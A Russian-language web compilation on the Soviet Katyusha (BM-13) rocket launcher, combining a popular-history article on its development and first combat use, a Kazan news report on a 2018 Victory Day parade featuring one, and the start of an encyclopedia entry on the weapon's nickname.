Катюша — уникальная боевая машина СССР

14 июля 1941 года на одном из участков обороны 20-й армии, в лесу восточнее Орши, взметнулись к небу языки пламени, сопровождавшиеся непривычным гулом, совсем не похожим на выстрелы артиллерийских орудий. Над деревьями поднялись облака черного дыма, а в небе с шипением понеслись в сторону немецких позиций едва заметные стрелы.

Вскоре весь район местного вокзала, захваченного гитлеровцами, был охвачен яростным огнем. Немцы, ошеломленные, в панике побежали. Противнику потребовалось много времени, чтобы собрать свои деморализованные подразделения. Так впервые в истории заявили о себе «катюши».

Первое боевое применение Красной Армией пороховых ракет нового типа относится к боям на Халхин-Голе. 28 мая 1939 года японские войска, оккупировавшие Маньчжурию, в районе реки Халхин-Гол перешли в наступление на Монголию, с которой СССР был связан договором о взаимопомощи. Началась локальная, но от того не менее кровопролитная война.

И вот здесь в августе 1939 года группа истребителей И-16 под командованием летчика-испытателя Николая Звонарева впервые применила ракетные снаряды РС-82.

Японцы сначала решили, что их самолеты атакованы хорошо замаскированной зенитной установкой. Только через несколько дней один из офицеров, принимавших участие в воздушном бою, доложил: «Под крыльями русских самолетов я видел яркие вспышки пламени!»

«Катюша» на боевой позиции

Из Токио прилетели эксперты, осмотрели подбитые самолеты и сошлись на том, что подобные разрушения может причинить только снаряд диаметром не менее 76 мм. Но ведь расчеты показывали, что самолет, способный выдержать отдачу пушки такого калибра, существовать просто не мог! Лишь на экспериментальных истребителях опробовались пушки калибра 20 мм. Чтобы выяснить секрет, за самолетами капитана Звонарева и его боевых товарищей летчиков Пименова, Федорова, Михайленко и Ткаченко была объявлена самая настоящая охота.

Но сбить или посадить хотя бы одну машину японцам не удалось.

Результаты же первого применения ракет, запускаемых с самолетов, превзошли все ожидания. Меньше чем за месяц боев (15 сентября было подписано перемирие) летчики группы Звонарева совершили 85 боевых вылетов и в 14 воздушных боях сбили 13 самолетов противника!

Ракеты, столь успешно показавшие себя на поле боя, разрабатывались с начала 1930-х годов в Реактивном научно-исследовательском институте (РНИИ), которым после репрессий 1937-1938 годов руководил химик Борис Слонимер. Непосредственно же над ракетами работал

Юрий Победоносцев, которому ныне и принадлежит честь называться их автором.

Успех нового оружия подстегнул работы над первым вариантом многозарядной установки, которая превратилась потом в «катюшу». В НИИ-3 Наркомата боеприпасов, как перед войной именовался РНИИ, этой работой в качестве главного инженера руководил Андрей Костиков, Современные историки довольно непочтительно отзываются о Костикове. И это справедливо, ведь в архивах обнаружились его доносы на сослуживцев (на того же Победоносцева).

Первый вариант будущей «катюши» заряжался 132-мм снарядами, похожими на те, которыми стрелял на Халхин-Голе капитан Звонарев. Вся установка с 24 направляющими монтировалась на грузовике ЗИС-5. Тут авторство принадлежит Ивану Гваю, который сделал перед тем «Флейту» — установку для реактивных снарядов на истребителях И-15 и И-16.  Первые полигонные испытания под Москвой, проведенные в начале 1939 года, выявили многие недоработки.

Военные специалисты, подходившие к оценке реактивной артиллерии с позиций ствольной артиллерии, видели в этих странных машинах технический курьез. Но, несмотря на насмешки артиллеристов, коллектив института продолжал упорную работу над вторым вариантом пусковой установки. Ее установили на более мощный грузовик ЗИС-6. Однако 24 направляющие, смонтированные, как и в первом варианте, поперек машины, не обеспечивали устойчивость машины при ведении огня.

Полигонные испытания второго варианта производились в присутствии маршала Клима Ворошилова. Благодаря его благожелательной оценке коллектив разработчиков получил поддержку командного состава. Тогда же конструктор Галковский предложил совершенно новый вариант: оставить 16 направляющих и монтировать их на машине продольно. В августе 1939 года опытная установка была изготовлена.

К тому времени группа под руководством Леонида Шварца сконструировала и опробовала образцы новых 132-мм ракет. Осенью 1939 года на Ленинградском артиллерийском полигоне провели очередную серию испытаний. На этот раз пусковые установки и снаряды к ним были одобрены. С этого момента реактивная установка стала официально именоваться БМ-13, что означало «боевая машина», а 13 — сокращение от калибра 132-мм реактивного снаряда.

Боевая машина БМ-13 представляла собой шасси трехосного автомобиля ЗИС-6, на котором была установлена поворотная ферма с пакетом направляющих и механизмом наведения. Для наводки предусматривался поворотный и подъемный механизм и артиллерийский прицел. В задней части боевой машины находились два домкрата, которые обеспечивали ее большую устойчивость при стрельбе. Пуск реактивных снарядов производился рукояточной электрокатушкой, соединенной с аккумуляторной батарей и контактами на направляющих. При повороте рукоятки по очереди замыкались контакты, и в очередном из снарядов срабатывал пусковой пиропатрон.

В конце 1939 года Главное артиллерийское управление Красной Армии дало заказ НИИ-3 на изготовление шести БМ-13. К ноябрю 1940 года этот заказ был выполнен. 17 июня 1941 года машины продемонстрировали на смотре образцов вооружения Красной Армии, проходившем под Москвой. БМ-13 осматривали маршал Тимошенко, нарком вооружения Устинов, нарком боеприпасов Ванников и начальник Генерального штаба Жуков. 21 июня по итогам смотра командование приняло решение о развертывании производства ракет М-13 и установок БМ-13.

Утром 22 июня 1941 года сотрудники НИИ-3 собрались в стенах своего института. Было ясно: новое оружие никаких войсковых испытаний проходить уже не будет — сейчас важно собрать все установки и отправить их в бой. Семь машин БМ-13 составили костяк первой батареи реактивной артиллерии, решение о формировании которой было принято 28 июня 1941 года. И уже в ночь на 2 июля она своим ходом убыла на Западный фронт.

Первая батарея состояла из взвода управления, пристрелочного взвода, трех огневых взводов, взвода боевого питания, хозяйственного отделения, отделения горюче-смазочных материалов, санитарной части. Кроме семи пусковых установок БМ-13 и 122-мм гаубицы образца 1930 года, служившей для пристрелки, в батарее было 44 грузовые машины для перевозки 600 реактивных снарядов М-13, 100 снарядов для гаубицы, шанцевого инструмента, трех заправок горюче-смазочных материалов, семи суточных норм продовольствия и другого имущества.

Капитан Иван Андреевич Флеров — первый командир опытной батареи «Катюш»

Командный состав батареи был укомплектован в основном слушателями Артиллерийской академии имени Дзержинского, только что окончившими первыми курс командного факультета.

Командиром батареи назначили капитана Ивана Флерова — офицера-артиллериста, имевшего за плечами опыт советско-финской войны. Никакой специальной подготовки ни офицеры, ни номера боевых расчетов первой батареи не имели, за период формирования удалось провести лишь три занятия.

Ими руководили разработчики ракетного оружия инженер-конструктор Попов и военный инженер 2-го ранга Шитов. Перед самым концом занятий Попов указал на большой деревянный ящик, укрепленный на подножке боевой машины. «При отправке вас на фронт, — сказал он, — мы набьем этот ящик толовыми шашками и поставим пиропатрон, чтобы при малейшей угрозе захвата реактивного оружия врагом можно было подорвать и установку, и снаряды». Через два дня после выступления из Москвы батарея стала частью 20-й армии Западного фронта, дравшейся за Смоленск.

В ночь с 12 на 13 июля ее подняли по тревоге и направили к Орше. На станции Орша скопилось множество немецких эшелонов с войсками, техникой, боеприпасами и горючим. Флеров приказал развернуть батарею в пяти километрах от станции, за горкой. Двигатели машин не заглушали, чтобы после залпа моментально покинуть позицию. В 15 часов 15 минут 14 июля 1941 года капитан Флеров дал команду открыть огонь.

Вот текст донесения в немецкий Генеральный штаб: «Русские применили батарею с небывалым числом орудий. Снаряды фугасно-зажигательные, но необычного действия. Войска, обстрелянные русскими, свидетельствуют: огневой налет подобен урагану. Снаряды разрываются одновременно. Потери в людях значительные». Моральный эффект от применения реактивных минометов был ошеломляющим. Противник потерял на станции Орша больше батальона пехоты и огромное количество боевой техники и вооружения.

В тот же день батарея Флерова обстреляла переправу через речку Оршица, где также скопилось немало живой силы и техники гитлеровцев. В последующие дни батарея использовалась на различных направлениях действий 20-й армии в качестве огневого резерва начальника артиллерии армии. Несколько удачных залпов было произведено по противнику в районах Рудни, Смоленска, Ярцево, Духовшины. Эффект превзошел все ожидания.

Немецкое командование пыталось заполучить образцы чудо-оружия русских. За батареей капитана Флерова, как когда-то за истребителями Звонарева, началась охота. 7 октября 1941 года под деревней Богатырь Вяземского района Смоленской области немцам удалось окружить батарею. Враг атаковал ее внезапно, на марше, обстреливая с разных сторон. Силы были неравными, но расчеты бились отчаянно, Флеров израсходовал последние боеприпасы, а затем взорвал пусковые установки.

Поведя людей на прорыв, он геройски погиб. 40 человек из 180 остались в живых, и всех, кто уцелел после гибели батареи в октябре 41-го, объявили без вести пропавшими, хотя они воевали до самой победы. Лишь по прошествии 50 лет после первого залпа БМ-13 поле у деревни Богатырь раскрыло свою тайну. Там наконец-то были найдены останки капитана Флерова и еще 17 ракетчиков, погибших вместе с ним. В 1995 году указом президента РФ Ивану Флерову было посмертно присвоено звание Героя России.

Батарея Флерова погибла, но оружие существовало и продолжало наносить урон наступающему врагу. В первые дни войны началось изготовление новых установок на московском заводе «Компрессор». Конструкторов тоже не надо было подгонять. В считанные дни они завершили разработку новой боевой машины для 82-миллиметровых снарядов — БМ-8. Она начала выпускаться в двух вариантах: один — на шасси автомобиля ЗИС-6 с 6 направляющими, другой — на шасси трактора СТЗ или танков Т-40 и Т-60 с 24 направляющими.

Очевидные успехи на фронте и в производстве позволили Ставке Верховного главнокомандования уже в августе 1941 года принять решение о формировании восьми полков реактивной артиллерии, которым еще до участия в боях присваивалось наименование «гвардейских минометных полков артиллерии резерва ВГК». Этим подчеркивалось особое значение, которое придавалось новому виду вооружений. Полк состоял из трех дивизионов, дивизион — из трех батарей, по четыре БМ-8 или БМ- 13 в каждой.

Для реактивного снаряда калибра 82 мм были разработаны и изготовлены направляющие, которые позднее устанавливали на шасси автомашины ЗИС-6 (36 направляющих) и на шасси легких танков Т-40 и Т-60 (24 направляющих). Специальные пусковые установки для реактивных снарядов калибра 82 мм и 132 мм изготовили для их последующей установки на боевые корабли — торпедные катера и бронекатера.

Выпуск БМ-8 и БМ-13 непрерывно рос, а конструкторы разрабатывали новый 300-миллиметровый реактивный снаряд М-30 весом 72 кг и с дальностью стрельбы 2,8 км. В народе они получили прозвище «андрюша». Запускались они с пускового станка («рамы»), изготовленного из дерева. Пуск производился с помощью саперной подрывной машинки. Впервые «андрюши» были применены в Сталинграде. Новое оружие было просто в изготовлении, но их установка на позиции и наводка на цель требовали много времени. К тому же небольшая дальность реактивных снарядов М-30 делала их опасными для своих же расчетов. Впоследствии боевой опыт показал, что М-30 — мощное оружие наступления, способное разрушать дзоты, окопы с козырьками, каменные постройки и другие укрепления. Была даже идея создать на основе «катюш» мобильный зенитно-ракетный комплекс для уничтожения авиации противника, однако опытную установку так и не довели до серийного образца.

Об эффективности боевого применения «катюш» в ходе наступления на укрепленный узел противника может послужить пример разгрома Толкачевского оборонительного узла в ходе нашего контрнаступления под Курском в июле 1943 года. Деревня Толкачево была превращена немцами в сильно укрепленный узел сопротивления с большим количеством блиндажей и дзотов в 5-12 накатов, с развитой сетью траншей и ходов сообщений. Подходы к деревне были плотно минированы и прикрыты проволочными заграждениями. Залпами реактивной артиллерии значительная часть дзотов была разрушена, траншеи вместе с находившейся в них вражеской пехотой засыпаны, огневая система полностью подавлена. Из всего гарнизона узла, насчитывавшего 450-500 человек, уцелели только 28. Толкачевский узел был взят нашими частями без какого-либо сопротивления.

К началу 1945 года на полях сражений действовали 38 отдельных дивизионов, 114 полков, 11 бригад и 7 дивизий, вооруженных реактивной артиллерией. Но были и проблемы. Массовое производство пусковых установок наладили быстро, однако широкое применение «катюш» сдерживалось из-за недостатка боеприпасов. Отсутствовала промышленная база по изготовлению высококачественных порохов для двигателей снарядов. Обычный порох в данном случае не мог быть использован — требовались особые сорта с нужной поверхностью и конфигурацией, временем, характером и температурой горения. Дефицит удалось лимитировать лишь к началу 1942 года, когда переброшенные с запада на восток заводы стали набирать требуемые темпы производства. За все время Великой Отечественной войны советская промышленность произвела более десяти тысяч боевых машин реактивной артиллерии.

Происхождение названия Катюша

Известно, почему установки БМ-13 стали в одно время именоваться «гвардейскими миномётами». Установки БМ-13 в действительности не являлись миномётами, но командование стремилось как можно дольше сохранять их конструкцию в секрете. Когда на полигонных стрельбах бойцы и командиры попросили представителя ГАУ назвать «подлинное» имя боевой установки, тот посоветовал: «Называйте установку как обычное артиллерийское орудие. Это важно для сохранения секретности».

Нет единой версии, почему БМ-13 стали именоваться «катюшами». Существует несколько предположений:
1. По названию ставшей популярной перед войной песни Блантера на слова Исаковского «Катюша». Версия убедительная, поскольку впервые батарея стреляла 14 июля 1941 года (на 23-й день войны) по скоплению фашистов на Базарной площади города Рудня Смоленской области. Стреляла с высокой крутой горы — ассоциация с высоким крутым берегом в песне тут же возникла у бойцов. Наконец, жив бывший сержант штабной роты 217-го отдельного батальона связи 144-й стрелковой дивизии 20-й армии Андрей Сапронов, ныне — военный историк, который и дал ей это имя. Красноармеец Каширин, прибыв с ним вместе после обстрела Рудни на батарею, удивлённо воскликнул: «Вот это песенка!» «Катюша», — ответил Андрей Сапронов (из воспоминаний А. Сапронова в газете «Россия» № 23 от 21-27 июня 2001 года и в «Парламентской газете» № 80 от 5 мая 2005 года). Через узел связи штабной роты новость о чудо-оружии по имени «Катюша» в течение суток стала достоянием всей 20-й армии, а через её командование — и всей страны. 13 июля 2011 года ветерану и «крёстному отцу» «Катюши» исполнилось 90 лет.

2. Ещё есть версия, что название связано с индексом «К» на корпусе миномёта — установки выпускались заводом имени Калинина (по другому источнику — заводом имени Коминтерна). А фронтовики любили давать прозвища оружию. Например, гаубицу М-30 прозвали «Матушкой», пушку-гаубицу МЛ-20 — «Емелькой». Да и БМ-13 поначалу иногда именовали «Раисой Сергеевной», таким образом расшифровывая сокращение РС (реактивный снаряд).

3. Третья версия предполагает, что именно так окрестили эти машины девушки с московского завода «Компрессор», работавшие на сборке.
Ещё одна, экзотичная версия. Направляющие, на которые устанавливались снаряды, назывались скатами. Сорокадвухкилограммовый снаряд поднимали два бойца, впрягшиеся в лямки, а третий обычно помогал им, подталкивая снаряд, чтобы он точно лёг на направляющие, он же сообщал державшим, что снаряд встал-закатился-накатился на направляющие. Его-то, якобы, и называли «катюшей» (роль державших снаряд и закатывающего постоянно менялась, так как расчёт БМ-13, в отличие от ствольной артиллерии, не был в явном виде разделён на заряжающего, наводящего и др.)

4. Следует также отметить, что установки были настолько засекречены, что даже запрещалось использовать команды «пли», «огонь», «залп», вместо них звучали «пой» или «играй» (для запуска надо было очень быстро крутить ручку электрокатушки), что, возможно, тоже было связано с песней «Катюша». Да и для нашей пехоты залп «катюш» был самой приятной музыкой.

5. Есть предположение о том, что первоначально прозвище «катюша» имел фронтовой бомбардировщик, оснащённый реактивными снарядами — аналогом М-13. И прозвище перескочило с самолёта на ракетную установку через снаряды.

И ещё интересные факты о названиях БМ-13:

В немецких войсках эти машины получили название «сталинские орга́ны» из-за внешнего сходства реактивной установки с системой труб этого музыкального инструмента и мощного ошеломляющего рёва, который производился при запуске ракет.

Во время боёв за Познань и Берлин установки для одиночного пуска М-30 и М-31 получили от немцев прозвище «русский фаустпатрон», хотя эти снаряды использовались не как противотанковое средство. «Кинжальными» (с дистанции 100—200 метров) пусками этих снарядов гвардейцы проламывали любые стены.

Если бы гитлеровские оракулы повнимательнее всматривались в знаки судьбы, то наверняка 14 июля 1941 года стало бы для них знаковым днем. Именно тогда в районе железнодорожного узла Орша и переправы через реку Оршица советскими войсками впервые были применены боевые машины БМ-13, получившие в армейской среде ласковое название «катюша». Результат двух залпов по скоплению сил противника стал ошеломляющим для врага. Потери немцев попали под графу «недопустимые».

Вот выдержки из директивы войскам гитлеровского высшего военного командования: «Русские имеют автоматическую многоствольную огнеметную пушку… Выстрел производится электричеством… Во время выстрела образуется дым…» Очевидная беспомощность формулировок свидетельствовала о полной неосведомленности немецкого генералитета относительно устройства и технических характеристик нового советского оружия — реактивного миномета.

Ярким примером эффективности гвардейских минометных частей, а их основу составляли «катюши», могут служить строки из воспоминаний маршала Жукова: «Реактивные снаряды своими действиями производили сплошное опустошение. Я смотрел районы, по которым велся обстрел, и увидел полное уничтожение оборонительных сооружений…»

Немцы разработали специальный план захвата нового советского оружия и боеприпасов к нему. Поздней осенью 1941 года им удалось это сделать. «Плененный» миномет был действительно «многоствольным» и выстреливал 16 реактивных мин. Его огневая мощь в несколько раз превосходила по эффективности миномет, стоявший на вооружении фашистской армии. Гитлеровским командованием было принято решение о создании равноценного оружия.

Немцы не сразу поняли, что захваченный ими советский миномет — это поистине уникальное явление, открывающее новую страницу в развитии артиллерии, эру реактивных систем залпового огня (РСЗО).

Надо отдать должное его создателям — ученым, инженерам, техникам и рабочим московского Реактивного научно-исследовательского института (РНИИ) и смежных предприятий: В. Аборенкову, В. Артемьеву, В. Бессонову, В. Галковскому, И. Гвай, И. Клейменову, А. Костикову, Г. Лангемаку, В. Лужину, А. Тихомирову, Л. Шварцу, Д. Шитову.

Главным отличием БМ-13 от аналогичного немецкого вооружения была необычайно смелая и неожиданная концепция: минометчики могли относительно неточными реактивными минами надежно поражать все цели заданного квадрата. Это достигалось именно благодаря залповому характеру огня, так как каждая точка обстреливаемой местности обязательно попадала в зону поражения какого-нибудь из снарядов. Немецкие конструкторы, осознав блистательное «ноу-хау» советских инженеров, решили воспроизвести если и не в виде копии, то с использованием главных технических идей.

Скопировать «катюшу» как боевую машину было в принципе возможно. Непреодолимые трудности начались при попытке сконструировать, отработать и наладить массовое производство аналогичных реактивных снарядов. Оказалось, что немецкие пороха не могут сгорать в камере двигателя реактивного снаряда столь же стабильно и устойчиво, как советские. Спроектированные немцами аналоги советских боеприпасов вели себя непредсказуемо: либо вяло сходили с направляющих, чтобы тут же упасть на землю, либо с бешеной скоростью начинали полет и взрывались в воздухе от чрезмерного повышения давления внутри камеры. Исправно долетали до цели считанные единицы.

Дело оказалось в том, что для эффективных нитроглицериновых порохов, которые применялись в снарядах «катюши», наши химики добились разброса значений так называемой теплоты взрывчатого превращения не выше 40 условных единиц, а чем меньше величина разброса, тем стабильнее горит порох. Аналогичные же немецкие пороха имели разброс этого параметра даже в одной партии выше 100 единиц. Это и приводило к нестабильной работе двигателей реактивных снарядов.

Немцы не знали, что боеприпасы для «катюши» были плодом более чем десятилетней деятельности РНИИ и нескольких крупных советских исследовательских коллективов, куда вошли лучшие советские пороховых заводов выдающиеся советские химики А. Бакаев, Д. Гальперин, В. Карькина, Г. Коновалова, Б. Пашков, А. Спориус, Б. Фомин, Ф. Хритинин и многие другие. Они не только разработали сложнейшие рецептуры ракетных порохов, но и отыскали простые и эффективные способы их массового, непрерывного и дешевого производства.

В то время, когда на советских заводах по готовым чертежам небывалыми темпами развертывалось и буквально ежедневно наращивалось производство гвардейских реактивных минометов и снарядов к ним, немцам только еще предстояло вести исследовательские и проектные работы по РСЗО. Но на это история им времени уже не отпустила.

Статья написана по материалам книги Непомнящий Н.Н. «100 великих тайн Второй мировой», М., «Вече», 2010 г., с. 152-157.

Легендарная «Катюша» и танк Т-34 проехали на параде Победы на площади Тысячелетия в Казани — Новости

Фото: Марат Мугинов

(Город Казань KZN.RU, 9 мая, Алсу Сафина). Парад войск Казанского гарнизона в честь 73-й годовщины Победы в Великой Отечественной войне прошел на площади Тысячелетия. В параде приняли участие около двух тысяч военнослужащих и воспитанников кадетских классов и представители юнармейского движения Татарстана. Кроме того, собравшиеся смогли увидеть современную военную технику и технику времен Великой Отечественной войны, в том числе легендарную «Катюшу» и танк Т-34. На параде присутствовали Президент Республики Татарстан Рустам Минниханов, Премьер-министр РТ Алексей Песошин, председатель Государственного Совета РТ Фарид Мухаметшин, Государственный советник РТ Минтимер Шаймиев, руководитель Аппарата Президента РТ Асгат Сафаров, Мэр Казани Ильсур Метшин и другие.

С самого утра на площади Тысячелетия начали собираться казанцы и гости города. В этот праздничный солнечный день сотни горожан вместе с семьями пришли почтить память участников Великой Отечественной войны и тружеников тыла, благодаря которым была одержана долгожданная победа, и посмотреть прохождение войск Казанского гарнизона. Самые юные зрители, некоторые в честь праздника были в пилотках, с интересом ожидали начала парада, сжимая в руках праздничные флажки с символикой Дня Победы и флаги страны.

Под музыку А.Александрова «Священная война» на площадь вынесли государственные флаги России, Татарстана и легендарное знамя Победы.

Фото: Марат Мугинов

По традиции перед началом парада в честь Дня Победы на главной праздничной площадке был показан театрализованный пролог. Танцевальные и вокальные номера рассказывали о тяготах войны, о том, какой ценой удалось одержать победу, о том, как нелегко было тем, кто трудился в тылу, о радости победы, о благодарности всем участникам войны. Выступления артистов сопровождалось видеохрониками и фотографиями военных лет, которые демонстрировались на экране, установленном под стенами Казанского Кремля. Зрителям напомнили и о татарстанцах – участниках Великой Отечественной войны, чьи имена навсегда останутся в памяти потомков.

На трибунах за театрализованным прологом наблюдали ветераны Великой Отечественной войны, труженики тыла, многие из которых порой не могли сдержать слез, вспоминая страшные и тяжелые для всей страны годы.

После театрализованного пролога началась торжественная часть мероприятия. Под музыку А.Александрова «Священная война» на площадь знаменная группа военнослужащих роты почетного караула Казанского высшего танкового командного Краснознаменного училища вынесла государственные флаги России, Татарстана и легендарное знамя Победы.

По традиции перед началом парада на главной праздничной площадке был показан театрализованный пролог.

Фото: Марат Мугинов

С одним из главных для страны праздников россиян поздравил Президент России Владимир Путин – по традиции было организовано прямое включение с Красной площади Москвы. Глава государства отметил, что этот праздник «всегда был, есть и будет самым дорогим, священным для каждой семьи, для всей нашей огромной страны, праздником общенациональной гордости и вечной, немеркнущей памяти».

«73 года назад закончилась Великая Отечественная война, нацизм был сломлен, положен конец его зверствам, бесчинствам и варварству, повержены преступные планы мирового господства, — отметил В.Путин. — Разгром нацистов стал грандиозной, триумфальной Победой, это долгожданное слово сразу облетело планету. И все страны, все народы понимали тогда, что именно Советский Союз определил исход Второй мировой войны, что этот великий жертвенный подвиг совершил наш солдат и наш народ». Президент страны напомнил, что Победы удалось достичь ценой тяжелейших, невосполнимых потерь, благодаря беспримерному мужеству на фронтах и в тылу. «Однако сегодня подвиг народа, спасшего Европу и мир от рабства, от истребления, от ужасов Холокоста пытаются перечеркнуть, исказить события войны, предать забвению подлинных героев, подделать, переписать, переврать саму историю, — сказал В. Путин. — Мы не позволим сделать это. Никогда. Наш долг – хранить память о доблести воинов, отдавших свои жизни ради жизни других, о всех наших солдатах и мужественных бойцах второго фронта, о вкладе в Победу стран антигитлеровской коалиции, о боевом братстве тех, кто противостоял нацизму».

«Наш народ сражался насмерть, — сказал глава государства. — Было сделано поистине невозможное. Никто не думал о себе, трудились героически: и женщины, и дети. Ради Родины, ради Победы. Ради тех, кто защищал страну, свои семьи в пекле войны».

Особые слова благодарности Владимир Путин адресовал ветеранам: «Опыт вашей жизни, опаленной войной, вечный пример для всех поколений. Мы преклоняемся перед вашей пронзительной преданностью Родине. Нам выпала великая честь быть вашими наследниками. Понимаем, как высока эта ответственность, и никогда вас не подведем».

Светлую память всех, кто не вернулся с войны, ветеранов, ушедших из жизни, почтили минутой молчания.

После поздравления с праздником Президента страны прозвучал гимн Российской Федерации.

Слова благодарности и признательности сказал Президент Татарстана Рустам Минниханов.

Фото: Марат Мугинов

Свои слова благодарности и признательности сказал и Президент Татарстана Рустам Минниханов. «Прошло 73 года, как закончилась Великая Отечественная война. 9 мая всегда был, есть и будет нашим главным праздником, — подчеркнул глава республики. — Это день национального триумфа и народной гордости, день скорби и вечной памяти».

«Великая Победа досталась нам ценой невосполнимых потерь — десятки миллионов погибших, тысячи сожженных городов и сел, разрушенные фабрики и заводы, уничтоженные памятники культуры, — напомнил Рустам Минниханов. – Мы никогда не забудем, что свобода и долгожданный мир отвоевали наши предки, капитаны и рядовые, ополченцы и труженики тыла, партизаны и подпольщики, старики, женщины и дети, люди разных национальностей и профессий. Они горели в танках и самолетах, замерзали в окопах, тонули на переправах, без сна и отдыха трудились на заводах и в госпиталях, поддерживали боевой дух на концертных площадках. Понимая, что каждый день может быть последним, они все равно шли в бой, прикрывая собой фронтовых друзей».

«Не скрывая гордости и слез, мы благодарим вас, дорогие ветераны и труженики тыла. Мы сделаем все, чтобы вам не было стыдно за нас, новое поколение, — отметил Президент Татарстана. – Наш народ никогда не простит и не забудет нацистам и их идеологическим наследникам многочисленных преступлений, ужасов геноцида, оккупации, голода и блокады». Рустам Минниханов подчеркнул, что сегодня наследники великой Победы — солдаты и командиры российской армии – продолжают защищать рубежи страны, эффективно противостоят агрессии и международному терроризму. «Наш мир и спокойствие в надежных руках», — уверен Рустам Минниханов. В завершение его выступления прозвучал гимн Татарстана.

Зрители смогли увидеть современную военную технику и технику времен Великой Отечественной войны.

Фото: Марат Мугинов

Торжественное прохождение войск Казанского гарнизона открыли воспитанники Казанского суворовского военного училища, знаменные группы с государственными флагами России и Татарстана, знаменем Победы и штандартами фронтов Великой Отечественной войны. По площади Тысячелетия прошли военнослужащие Казанского высшего танкового командного Краснознаменного училища, парадный расчет Казанского суворовского военного училища, парадный расчет офицеров и курсантов Казанского высшего танкового командного Краснознаменного училища, слушатели и курсанты Казанского юридического института МВД России, сотрудники органов внутренних дел по РТ, бойцы отдельного отряда специального назначения Приволжского округа войск Национальной гвардии РФ, сотрудники Управления Федеральной службы исполнения наказаний по РТ, Главного управления МЧС России по РТ, Татарстанской таможни. Кроме того, в параде приняли участие сводная рота курсантов факультета военного обучения КНИТУ-КХТИ, сводная рота парадного расчета КНИТУ-КАИ, студентки Казанского медицинского университета, представители юнармейского движения Татарстана, ученики Казанской кадетской школы-интерната имени героя Советского Союза Бориса Кузнецова, воспитанники кадетского корпуса школы №67, участники боевых действий в Афганистане и других локальных конфликтах, рота почетного караула Казанского танкового училища.

Особое внимание привлекла боевая техника – на площадь выехали 19 единиц техники времен Великой Отечественной войны и современной. Среди них – легендарная БМ-13 «Катюша», танк Т-34, БТР 82а и БТР 80, ИС-3, 152-я гаубица образца 1943 года (Д-1), советские военные полноприводные легковые автомобили ГАЗ-67, мотоциклы. Завершил прохождение сводный военный оркестр Казанского гарнизона.

В параде приняли участие около двух тысяч военнослужащих и воспитанников кадетских классов и представители юнармейского движения Татарстана. 

Фото: Марат Мугинов

Зрители парада также увидели прохождение колонны исторических автомобилей «Авторетроклуба-21» — легендарной «полуторки», ГАЗ-67, ГАЗ-М1 «Эмка», ЗИС-110, ЗИМ, ГАЗ-21 «Волга», ГАЗ-69, пожарной автоцистерны АЦ-20 на шасси ГАЗ-51, грузовика ГАЗ-51.

Праздник на площади Тысячелетия продолжился концертом с участием мастеров искусств республики и творческих коллективов города. Здесь же была организована экспозиция военно-патриотической выставки, в рамках которой представлены современные образцы техники (2 танка — Т-80, Т- 90, 2 единицы БМП — БМП-2, БМП-3 и БТР-80), и работала полевая кухня.

Напомним, что в Казани праздничные мероприятия в честь 73-й годовщины Победы в Великой Отечественной войне начались с самого утра – с возложения цветов, венков и гирлянд в местах воинских захоронений на Арском и Архангельском кладбищах, а также в парке Победы — к Вечному огню и монументу Матерям и Вдовам.

До 20.00 народные гулянья проходят в парке Победы. Кроме того, Казань как и в предыдущие годы присоединится к акции «Бессмертный полк». Вечером с 20.00 казанцев и гостей столицы Татарстана ожидает концертная программа. Торжественные мероприятия продолжатся до 22.00 и завершатся праздничным салютом, который будет запущен с акватории реки Казанка.

С полным списком мероприятий можно ознакомиться в специальном разделе на портале KZN. RU. 

Катюша (оружие) — это… Что такое Катюша (оружие)?

Монумент «Катюша» в городе Рудня, посвящённый первой в мире ракетной батарее капитана И. А. Флёрова У этого термина существуют и другие значения, см. Катюша. Эта статья — о народном прозвище этой и других советских РСЗО периода Великой Отечественной войны. О наиболее известной боевой машине, носившей его см. БМ-13; о совокупности советских боевых машин реактивной артиллерии этого периода см. Гвардейский реактивный миномёт.

Катю́ша — появившееся во время Великой Отечественной войны 1941—45 неофициальное название бесствольных систем полевой реактивной артиллерии[1] (БМ-8, БМ-13, БМ-31 и других). Такие установки активно использовались Вооружёнными Силами СССР во время Второй мировой войны. Популярность прозвища оказалась столь большой, что «Катюшами» в разговорной речи стали нередко именовать и послевоенные РСЗО на автомобильных шасси, в частности БМ-14 и БМ-21 «Град».

История создания

Ещё в 1921 году сотрудники Газодинамической лаборатории Н. И. Тихомиров и В. А. Артемьев приступили к разработке реактивных снарядов для самолётов.

В 1929—1933 годах Б. С. Петропавловский при участии Г. Э. Лангемака, Е. С. Петрова, И. Т. Клейменова, Ю. А. Победоносцева, Л. Э. Шварца и других сотрудников ГДЛ проводили официальные испытания реактивных снарядов различных калибров и назначения с использованием многозарядных и однозарядных авиационных и наземных пусковых станков. Большое внимание руководство страны и Народного Комиссариата Обороны СССР уделяло разработке реактивных снарядов, как средств доставки химического оружия.

В 1937—1938 годах реактивные снаряды разработанные РНИИ (ГДЛ вместе с ГИРД в октябре 1933 года составили вновь организованный РНИИ) под руководством Г. Э. Лангемака приняты на вооружение РККВФ. Реактивные снаряды РС-82 (реактивный снаряд калибром 82 мм) устанавливали на истребителях И-15, И-16, И-153, во время войны — на штурмовиках Ил-2, с разработкой РС-132 — на бомбардировщиках СБ и штурмовиках Ил-2.

Летом 1939 года РС-82 на И-16 и И-153 успешно применялись в боях с японскими войсками на реке Халхин-Гол.

В 1939—1941 годах сотрудники РНИИ И. И. Гвай, В. Н. Галковский, А. П. Павленко, А. С. Попов и другие создали многозарядную пусковую установку, смонтированную на грузовом автомобиле.

В марте 1941 года были успешно проведены полигонные испытания установок БМ-13 (боевая машина со снарядами калибра 132 мм).

Реактивный снаряд РС-132 (осколочно-фугасный снаряд калибра 132 мм) и пусковая установка на базе грузового автомобиля ЗИС-6 БМ-13 были приняты на вооружение 21 июня 1941 года.

Производство установок БМ-13 было организовано на Воронежском заводе им. Коминтерна и Московском компрессорном заводе «Борец». Одним из основных производителей БМ-13 был Московский завод имени Владимира Ильича.

Происхождение названия

Известно, почему установки БМ-13 стали в одно время именоваться «гвардейскими миномётами». Установки БМ-13 в действительности не являлись миномётами, но командование стремилось как можно дольше сохранять их конструкцию в секрете:

Когда на полигонных стрельбах бойцы и командиры попросили представителя ГАУ назвать «подлинное» имя боевой установки, тот посоветовал: «Называйте установку как обычное артиллерийское орудие. Это важно для сохранения секретности».[2]

Нет единой версии, почему БМ-13 стали именоваться «катюшами». Существует несколько предположений[3]:

